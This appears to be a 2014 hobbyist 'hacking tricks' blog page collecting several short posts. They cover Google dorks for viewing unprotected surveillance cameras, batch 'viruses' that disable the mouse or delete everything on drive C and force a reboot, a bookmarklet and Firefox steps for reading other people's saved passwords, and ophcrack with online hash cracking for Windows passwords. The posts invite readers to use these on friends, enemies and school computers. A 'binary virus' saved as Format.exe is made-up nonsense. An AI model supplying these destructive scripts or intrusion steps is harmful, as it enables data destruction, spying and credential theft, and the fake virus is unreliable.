Friday, 28 November 2014

View Or Hack Unprotected Live Cameras Using Google

By : Amandeep Singh Chawla

hack unprotected cam
In this tutorial i will teach you to hack or view unprotected cam using a simple google trick. Using this trick you can see live view of streets in china or america. Inner view of some office and lot more. Lets dive into it.




How To View Unprotected Cam ?       

     1. Go to Google and search for "inurl:view/view.shtml" (without quote).
           2. Now open any of the link from the search result and enjoy.
             3. Below is the list of google dork you can use to see more cams.

      List Of Google Dork

      • inurl:/view.shtml
      • intitle:”Live View / - AXIS” | inurl:view/view.shtml^
      • inurl:ViewerFrame?Mode=
      • inurl:ViewerFrame?Mode=Refresh
      • inurl:axis-cgi/jpg
      • inurl:axis-cgi/mjpg (motion-JPEG)
      • inurl:view/indexFrame.shtml
      • inurl:view/index.shtml
      • inurl:view/view.shtml
      • intitle:start inurl:cgistart
      • intitle:”live view” intitle:axis
      • liveapplet
      • intitle:snc-z20 inurl:home/
      • intitle:liveapplet
      • intitle:”i-Catcher Console - Web Monitor”
      • intitle:axis intitle:”video server”
      • intitle:liveapplet inurl:LvAppl
      • intitle:”EvoCam” inurl:”webcam.html”
      • intitle:”Live NetSnap Cam-Server feed”
      • intitle:”Live View / - AXIS”
      • intitle:”Live View / - AXIS 206W”
      • intitle:”Live View / - AXIS 210″
      • inurl:indexFrame.shtml Axis
      • intitle:”Live View / - AXIS 206M”
      • inurl:”MultiCameraFrame?Mode=Motion”
      • allintitle:”Network Camera NetworkCamera”
      • intitle:”WJ-NT104 Main Page”
      • intext:”MOBOTIX M1″ intext:”Open Menu”
      • intext:”MOBOTIX M10″ intext:”Open Menu”
      • intext:”MOBOTIX D10″ intext:”Open Menu”
      • intitle:”netcam live image”
      • intitle:snc-cs3 inurl:home/
      • intitle:snc-rz30 inurl:home/
      • intitle:”sony network camera snc-p1″
      • intitle:”sony network camera snc-m1″
      • site:.viewnetcam.com -www.viewnetcam.com
      • intitle:”Toshiba Network Camera” user login

      Create Binary Virus To Format Hard Disk

      By : Amandeep Singh Chawla

      Create Binary Virus to Format Hard Disk
      Today i will show you to make a virus to format Hard disk using binary code. You cansend this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.




      How To Create Virus To Format Hard Drive ?

         1. Copy the below codes into Notepad.
      01001011000111110010010101010101010000011111100000
         2. Save the file as Format.exe
         3. You just created virus to format Hard Drive. Enjoy !!!

      How To Block Unblock Websites ?

      By : Amandeep Singh Chawla

      • Go to Start and then Run.
      • Type in this C:\WINDOWS\system32\drivers\etc
      • Now you will see file name Host open that in Notepad.
      • Below "127.0.0.1 localhost" add IP address of site to be blocked.
      • To unblock any site just reversed the process.



         
            EXAMPLE
           127.0.0.1 localhost
           69.171.224.14    (This will block Facebook)
           NOTE: For each site you block just add "1" to the IP (127.0.0.1)

      Get Password Behind Asterisks

      By : Amandeep Singh Chawla


                 This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.

      • Go to the page that contain password in asterisks.
      • Now copy the following code.
      javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
      • Paste the code into address bar of the page.
      • Now you will get the password on that page.

      Make A Virus That Disable Mouse

      By : Amandeep Singh Chawla

      Make A Virus That Disable Mouse
      I had previously posted on making different batch files like matrix effectopening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harm-full it will disable your mouse so think before trying it on yourself.




      How To Disable Mouse

        1. Open Notepad and copy below codes
      rem ---------------------------------
      rem Disable Mouse
      set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
      reg delete %key%
      reg add %key% /v Start /t REG_DWORD /d 4
      rem ---------------------------------
        2. Save this file as  virus.bat
        3. Done you just created your virus.

      How To Hack Saved Password In Firefox ?

      By : Amandeep Singh Chawla

      1. Open Firefox Web Broweser
      2. Then Click on FireFox > Option > Option as shown in below picture
      3. Then a POP Up box will appear, In that go to security and click on Show Passwordsas show below.
      4. Now click on website whose password you want to see ans click on show passwordas shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)

      5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 

      Finding Ip Address Of A Website Using Command Prompt Or CMD

      Byt : Amandeep Singh Chawla

      In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website serverand do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.



      How to find IP ?

      1. Go to Start > Type CMD and press Enter.
      2. Now write Ping followed by website URL whose IP you want to find.
      finding ip adddress of website

      3. It will take less then a second and come up with the results as shown below.
      finding ip adddress of website

      In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.


      Password Protect Any Folder Without Any Software

      By : Amandeep SIngh Chawla

      How To Lock Folder ?

         1. Open Notepad and Copy code given below into it.
      cls
      @ECHO OFF
      title coolhacking-tricks.blogspot.com
      if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
      if NOT EXIST MyFolder goto MDMyFolder
      :CONFIRM
      echo Are you sure to lock this folder? (Y/N)
      set/p "cho=>"
      if %cho%==Y goto LOCK
      if %cho%==y goto LOCK
      if %cho%==n goto END
      if %cho%==N goto END
      echo Invalid choice.
      goto CONFIRM
      :LOCK
      ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
      attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
      echo Folder locked
      goto End
      :UNLOCK
      echo Enter password to Unlock Your Secure Folder
      set/p "pass=>"
      if NOT %pass%== coolhacks goto FAIL
      attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
      ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
      echo Folder Unlocked successfully
      goto End
      :FAIL
      echo Invalid password
      goto end
      :MDMyFolder
      md MyFolder
      echo MyFolder created successfully
      goto End
      :End
         2. Save the notepad file as lock.bat (.bat is must)
         3. Now double click on lock.bat and a new folder will be created with name MyFolder
         4. Copy all your data you want to protect in that New folder
         5. Now double click on lock.bat and when command promp appears Type Y and press enter.
         6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
         7. It will ask for password enter your password and done. (Default password is coolhacks)
      • To change the password replace coolhacks with  new password in the above code

      How To Further Secure ?

      You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

      How To Open Banned Websites WIth Proxy Sites ?

      By : Amandeep Singh Chawla

      Open Banned Websites WIth Proxy Sites

      There are many sites which are blocked by government because of breaking laws of their country. The user downloads many softwares to open these sites but end up being infected by  malware, virus. Today i will share a trick with you guys which can help you easily open these banned sites without downloading anything. As you know that there are many online proxies but everyone need a proxy server which is faster and trusted. Here in this post I am revealing an online proxy and a tutorial to open banned sites with the help of these online proxies which is trusted and fast. Just follow my step to open banned sites.




      How To Open Banned Site ?

      1. Open www.incloak.com in your browser.
      2. After that enter the URL of the site which you want to open like below.
      Open Banned Websites WIth Proxy Sites
      3. Now click the Hide Me button and enjoy.

      Hack windows 7 Password using ophcrack

      By : Amandeep Singh Chawla



      Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password.
      Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

        1. Download Opcrack Live Cd by Clicking Here.
        2. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
      • Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
      • Windows XP: Click on ophcrack XP LiveCD.
        2. Now burn the live image on to the cd.
        3. Insert the disc into drive and restart you computer.
        4. If everything goes right you will see screen like below.
      window7 password hacking

        5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
        6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
        7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word “empty”. This means that if the account is enabled you could log in without a password.
      Windows 7 Password hacking
        8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
        9. Copy this hash value which is under NT Hash field.
       10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
       11. Type in the hash value you copied down in Step 9, Enter the captche and click onCrack Hashes.

      create virus to delete local disk c

      By : Amandeep Singh Chawla


      Friends today im gona show you how to create a virus and clear all the content of "Local disk c" so just follow the steps below:

      1.Open the NotePad
      2.Coppy the below given code to notepad
      3.Save the file named as "Virus.bat".(you can give any name to it but be specific about the extension that it will be .bat  only)
      4.save the file and run it.

      Code:
      @echo off
      del %systemdrive%\*.*/f/s/q
      shutdown -r -f -t 00

      Warning: Try it at your own risk Hacking and cracking will not be responsible for any damage